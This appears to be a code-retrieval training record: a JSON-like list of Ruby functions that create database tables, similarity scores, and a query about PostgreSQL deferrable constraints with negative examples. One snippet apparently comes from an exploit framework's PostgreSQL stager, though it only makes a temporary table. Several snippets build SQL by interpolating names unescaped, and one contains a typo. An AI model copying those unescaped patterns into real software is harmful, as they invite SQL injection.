"def executeNoArgs\n db =Rho::Database.new(Rho::Application.databaseFilePath('local'), \"local\");\n \n tableName = Library.getRandomName\n puts \"Table Name #{tableName}\"\n \n db.executeSql(\"CREATE TABLE #{tableName}(x INTEGER, y TEXT)\") \n data = db.isTableExist(tableName)\n \n puts \"#{data}\"\n data\nend",
"def postgres_create_stager_table\n tbl = Rex::Text.rand_text_alpha(8).downcase\n fld = Rex::Text.rand_text_alpha(8).downcase\n resp = postgres_query(\"create temporary table #{tbl}(#{fld} text)\")\n if resp[:sql_error]\n print_error resp[:sql_error]\n return false\n end\n return [tbl,fld]\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def table_exists?\n true\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def ensure_table\n # Check if table exists\n if !@db.tables || !@db.tables.include?(table_name)\n log(\"Creating Table #{table_name}\")\n adaptor_name = @adaptor.adaptor_name\n @db.create_table(table_name) do\n # guid id\n column :id, String, :unique => true, :null => false, :primary_key => true\n\n # When using underscore notation on a field that does not exist, the\n # data will be stored in extra.\n if adaptor_name == 'postgres'\n # Use jsonb\n column :extra, 'json'\n else\n column :extra, String\n end\n end\n # TODO: there's some issue with @db.schema and no clue why, but I\n # have to run this again to get .schema to work later.\n @db.tables\n end\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create_new_table(table_sql)\n begin\n do_sql_command(table_sql)\n LOGGER.info \"Successfully reated new table: \\n#{table_sql}\\n\"\n rescue Mysql::Error\n if ($!.to_s =~ /^Table .* already exists$/) == 0\n LOGGER.warn \"Database error, duplicate table is okay, moving on: #{$!}\"\n else\n LOGGER.error \"Database error, moving on: #{$!}\"\n end\n end\nend",
"def create_database_if_missing\n result = PG.connect.exec \"select count(*) as db_exists from pg_database where datname = '#{db_name}'\"\n if result[0]['db_exists'] == '0'\n `createdb #{db_name}`\n `echo 'create extension postgis' | psql #{db_name}`\n @log.warn \"Created database #{db_name}.\"\n end\n end",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_table\n if TinyDyno::Adapter.table_exists?(table_name: self.table_name)\n return true\n end\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_user_table(database)\n\tcreate_user_table_cmd = <<-SQL \n\tCREATE TABLE IF NOT EXISTS users(\n\t\tid INTEGER PRIMARY KEY,\n\t\tname VARCHAR(255) UNIQUE\n\t)\nSQL\n\tdatabase.execute(create_user_table_cmd)\nend",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def create_table\n sql = \"create table if not exists checksums (\n date varchar(25),\n basename varchar(70),\n suitename varchar(20),\n mtime varchar(25),\n md5 varchar(32),\n sha1 varchar(40),\n sha256 varchar(64)\n )\"\n @pkgdb.query(sql)\n end",
"def create\n if @db.table_info(METADATA_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{METADATA_TABLE_NAME} (key VARCHAR(1024), val VARCHAR(8192), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(RUN_HISTORY_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{RUN_HISTORY_TABLE_NAME} (name VARCHAR(1024), outcome VARCHAR(16), env VARCHAR(255), time DATETIME)\"\n @db.execute(stmt)\n\n index_stmt = \"CREATE INDEX index_run_history ON #{RUN_HISTORY_TABLE_NAME} (time DESC)\"\n @db.execute(index_stmt)\n end\n\n if @db.table_info(DISABLED_MONITOR_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{DISABLED_MONITOR_TABLE_NAME} (name VARCHAR(1024), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(MONITOR_INFO_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{MONITOR_INFO_TABLE_NAME} (name VARCHAR(1024), description VARCHAR(8192))\"\n @db.execute(stmt)\n end\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def create_initial_table_in_database\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n end\nend",
"def create_initial_table_in_database\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n end\nend",
"def sqlite3_create_tb(table_name, columns, primary_key, if_not_exist)\n if if_not_exist.downcase == \"n\"\n status = @dbm.table_exist?(table_name)\n @assert.table_already_exist(status, table_name, @dbh)\n end \n\n # Retrieve only the column names\n col_names = columns[0].keys\n\n table_spec_str = '('\n # col: Column name\n # columns[0][col][0]: Column type\n # columns[1][col][1]: Column nullable\n col_names.each {|col|\n col_type = columns[0][col][0]\n @assert.check_type(col_type)\n if col == primary_key\n table_spec_str.concat(\"#{col} #{col_type} PRIMARY KEY NOT NULL,\")\n else\n if columns[0][col][1].downcase == \"no\"\n table_spec_str.concat(\"#{col} #{col_type} NOT NULL,\")\n else\n table_spec_str.concat(\"#{col} #{col_type},\")\n end\n end\n }\n table_spec_str.chomp!(',')\n table_spec_str.concat(')')\n \n create_query = \"CREATE TABLE IF NOT EXISTS #{table_name} #{table_spec_str};\"\n @dbh.execute(create_query)\n\n return create_query + \"\\n\"\n end",
"def run\n ActiveRecord::Base.connection.create_table :not_deleted do |table|\n table.string :name\n end\n false\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def table_does_not_exist\n exists = table_exists?\n errors.add(:base, :table_exists, {:table_name => to_table}) if exists\n !exists\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def create_initial_table_in_database\n\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n\n end\n\nend",
"def create_initial_table_in_database\n\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n\n end\n\nend",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def create_temp_table\n RailsRedshiftReplicator.connection.exec \"CREATE TEMP TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_versioning_table\n logger.info \"Creating versioning table '_v_#{name}' in the audit schema\"\n db.query(\"CREATE TABLE #{versioning} LIKE #{watched}\")\n db.query(\"ALTER TABLE #{versioning} ADD `_row_version` BIGINT NOT NULL DEFAULT 0\")\n db.query(\"ALTER TABLE #{versioning} DROP PRIMARY KEY, ADD PRIMARY KEY (#{([primary_key] << '_row_version').flatten.join(',')})\")\n\n db.query(\"SHOW CREATE TABLE #{versioning}\").to_a[0]['Create Table'].scan(/UNIQUE KEY `([^`]+)`/).flatten.each do |idx|\n db.query(\"ALTER TABLE #{versioning} DROP INDEX `#{idx}`\")\n end\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def create_book_owners(db)\r\n create_book_owners_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_owners(\r\n owner_id INTEGER PRIMARY KEY,\r\n owner_name VARCHAR(255)\r\n )\r\n SQL\r\n #create book_owners table \r\n db.execute(create_book_owners_cmd)\r\nend",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def table_exists?(table='test_ruby') \n begin\n res = @db.query(\"select * from #{table} where 1=0\")\n return true\n rescue\n return false\n end\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def create_table?\n db.create_table? :habits do\n primary_key :id\n String :title\n Integer :display_order\n end\n\n db.create_table? :entries do\n primary_key :id\n String :type\n DateTime :timestamp\n foreign_key :habit_id, :habits, on_delete: :cascade\n end\n end",
"def createUserTable(tableName)\n @conn.exec(\"DROP TABLE IF EXISTS #{tableName}\")\n @conn.exec(\"CREATE TABLE #{tableName} (id SERIAL PRIMARY KEY NOT NULL, course_id character varying(255) NOT NULL, name character varying(255), slug character varying(255), course_site character varying(255), instructors character varying(255000), partners character varying(255000), homepage character varying(255000), counter integer not null default 0, url_photo character varying(255000), summary character varying(255000)) WITH (OIDS=FALSE);\");\n end",
"def create_table(table_name, column_definition = {})\n cols = column_definition.to_a.map { |a| a.join(' ') }.join(', ')\n stmt = %{CREATE TABLE \"#{table_name}\" (#{cols})}\n execute(stmt)\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def create_table(table)\n raise IMDB::DatabaseExceptions::TableExists.new(table.name) if @tables.has_key? table.name\n @tables[table.name] = table\n end",
"def ___create_tbl(tbl)\n return if internal('tables').split(' ').include?(tbl.tid)\n @que.push tbl.create\n verbose { \"'#{tbl.tid}' is created\" }\n end",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def show_create_table(db, table)\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def checkifexists\n que = \" CREATE TABLE IF NOT EXISTS rubicante_logs ( \"\n que += \" id INT UNSIGNED PRIMARY KEY AUTO_INCREMENT, \"\n que += \" timestamp DATETIME, \"\n que += \" nickname VARCHAR(31), \"\n que += \" clienthost VARCHAR(255), \"\n que += \" action VARCHAR(20), \"\n que += \" channel VARCHAR(100), \"\n que += \" msg TEXT \"\n que += \" );\"\n\n # Perform the query! \n @mResource.query(que) \n end",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def create_book_readers(db)\r\n create_book_readers_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_readers(\r\n reader_id INTEGER PRIMARY KEY,\r\n reader_name VARCHAR(255)\r\n )\r\n SQL\r\n #create the table\r\n db.execute(create_book_readers_cmd)\r\nend",
"def create_mysql_table name, columns\n sql = \"CREATE TABLE IF NOT EXISTS `#{name.strip}` (\"\n\n for column in columns.split(',')\n sql << \"`#{column.strip}` VARCHAR(500),\"\n end\n\n sql.gsub!(/,$/, '')\n sql << ')'\n\n ActiveRecord::Base.connection.execute(sql)\nend",
"def define_table(table_name, columns, force)\n if !db_connection.table_exists?(table_name) || force\n db_connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def create_table( table_name, options = {}, &block )\n super( table_name, options, &block )\n @connection.schema.load_table( table_name.to_s )\n end",
"def define_table(table_name, columns, force)\n if !ActiveRecord::Base.connection.table_exists?(table_name) || force\n ActiveRecord::Base.connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def table_exists?\n db.table_exists?(table_name)\n end",
"def cache_table_exists?\n @pg.exec(%{SELECT 1 FROM pg_class WHERE pg_class.relname = '#{@table_name}';}).ntuples.eql?(1)\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def table_exists(dbh, db_name, tbl_name)\n return !dbh.select_one(\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES\n WHERE TABLE_SCHEMA = ? AND TABLE_NAME = ?\",\n db_name, tbl_name).nil?\nend",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def createTable\n\t\tstm = @db.prepare \"CREATE TABLE IF NOT EXISTS leituras (\n\t\t\t\tIDCLIENTE INT NOT NULL,\n\t\t\t\tIDSENSOR INT NOT NULL,\n\t\t\t\tVALUE INT NOT NULL,\n\t\t\t\tGPSX INT NOT NULL,\n\t\t\t\tGPSY INT NOT NULL,\n\t\t\t\tTIMESTAMP TEXT NOT NULL\n\t\t\t);\"\n\n\t\trs = stm.execute\n\t\trs.close\n\tend",
"def createurlTable\n @conn.exec(\"CREATE TABLE urls (uid serial NOT NULL, loc character varying(255), CONSTRAINT urls_pkey PRIMARY KEY (uid)) WITH (OIDS=FALSE);\");\n end",
"def ensure_present!(create_if_needed)\n return unless @low_card_model.table_exists?\n\n current_name = current_unique_all_columns_index_name\n return true if current_name\n\n if create_if_needed\n create_unique_index!\n true\n else\n message = %{You said that the table '#{low_card_model.table_name}' is a low-card table.\nHowever, it currently does not seem to have a unique index on all its columns. For the\nlow-card system to work properly, this is *required* -- although the low-card system\ntries very hard to lock tables and otherwise ensure that it never will create duplicate\nrows, this is important enough that we really want the database to enforce it.\n\nWe're looking for an index on the following columns:\n\n #{value_column_names.sort.join(\", \")}\n\n...and we have the following unique indexes:\n\n}\n current_unique_indexes.each do |unique_index|\n message << \" '#{unique_index.name}': #{unique_index.columns.sort.join(\", \")}\\n\"\n end\n message << \"\\n\"\n\n raise LowCardTables::Errors::LowCardNoUniqueIndexError, message\n end\n end",
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end"
] |
[
"0.8169112",
"0.81165934",
"0.74088",
"0.7350597",
"0.7100451",
"0.7100451",
"0.7086276",
"0.6980296",
"0.6929266",
"0.68034923",
"0.6684206",
"0.66616875",
"0.65244293",
"0.6499984",
"0.64946395",
"0.6465946",
"0.6458165",
"0.64432794",
"0.64391005",
"0.6437936",
"0.64346486",
"0.6422509",
"0.64203787",
"0.64019585",
"0.63882905",
"0.6379815",
"0.6361446",
"0.6354551",
"0.63165635",
"0.6314898",
"0.6310776",
"0.63069266",
"0.6306087",
"0.6279063",
"0.6232852",
"0.6231137",
"0.6229414",
"0.6207805",
"0.6198854",
"0.61946595",
"0.618341",
"0.6168873",
"0.6168873",
"0.61674315",
"0.61359364",
"0.6133217",
"0.6120772",
"0.61140877",
"0.61110294",
"0.61110294",
"0.61110294",
"0.6106355",
"0.6097211",
"0.6091356",
"0.6091356",
"0.60484177",
"0.6045582",
"0.60398215",
"0.60372597",
"0.6033315",
"0.60304487",
"0.59833133",
"0.59481025",
"0.59459525",
"0.59411556",
"0.5927925",
"0.5920493",
"0.5920079",
"0.59193206",
"0.5913368",
"0.5909388",
"0.59035623",
"0.5886797",
"0.58852226",
"0.5881762",
"0.58790326",
"0.58624333",
"0.5855874",
"0.5842527",
"0.5840187",
"0.58334184",
"0.58215475",
"0.5814891",
"0.58146495",
"0.5805142",
"0.57996786",
"0.57828605",
"0.5736525",
"0.5735255",
"0.5734583",
"0.57308936",
"0.572715",
"0.5723927",
"0.571836",
"0.57181066",
"0.5716473",
"0.57164556",
"0.5712073",
"0.570689",
"0.56986725"
] |
0.7571522
|
2
|
PostgreSQL 9.0+ supports some types of deferrable constraints beyond foreign key constraints.
|
def supports_deferrable_constraints?
server_version >= 90000
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def supports_deferrable_foreign_key_constraints?\n supports_deferrable_constraints?\n end",
"def supports_deferrable_constraints?\n false\n end",
"def supports_deferrable_constraints?\n false\n end",
"def supports_external_drop_constraints?() true; end",
"def can_add_primary_key_constraint_on_nullable_columns?\n true\n end",
"def supports_external_drop_constraints?() false; end",
"def foreign_key_constraints_enabled?\n @disable_foreign_key_constraints != true\n end",
"def constraints(_)\n nil\n end",
"def supports_foreign_keys?\n false\n end",
"def supports_foreign_keys?\n false\n end",
"def foreign_key_present?\n false\n end",
"def foreign_key_present?\n false\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end",
"def invalid_alter_table_type?(type, options)\n type.to_sym == :primary_key || options[:primary_key] ||\n options[:null] == false && options[:default].nil?\n end",
"def supports_foreign_keys_in_create?\n supports_foreign_keys?\n end",
"def constraints; end",
"def constraints; end",
"def constraints; end",
"def valid_alter_table_options( type, options )\n type.to_sym != :primary_key\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def supports_external_add_constraints?() false; end",
"def implementation_no_master_association\n defined?(foreign_key_name) && foreign_key_name.blank?\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def constraints\n super\n end",
"def foreign_key_default\n nil\n end",
"def foreign_key?\n false\n end",
"def check_all_foreign_keys_valid!\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_external_add_constraints?() true; end",
"def constraint_deferrable_sql_append(sql, defer)\n case defer\n when nil\n when false\n sql << ' NOT DEFERRABLE'\n when :immediate\n sql << ' DEFERRABLE INITIALLY IMMEDIATE'\n else\n sql << ' DEFERRABLE INITIALLY DEFERRED'\n end\n end",
"def supports_check_constraints?\n false\n end",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def all_foreign_keys_valid?\n check_all_foreign_keys_valid!\n true\n rescue ActiveRecord::StatementInvalid\n false\n end",
"def foreign_key?\n true\n end",
"def preconditions\n ActiveRecord::VERSION::MAJOR >= 6 &&\n Helper.postgresql? &&\n primary_field? &&\n column.sql_type.to_s.match(TARGET_COLUMN_TYPE)\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
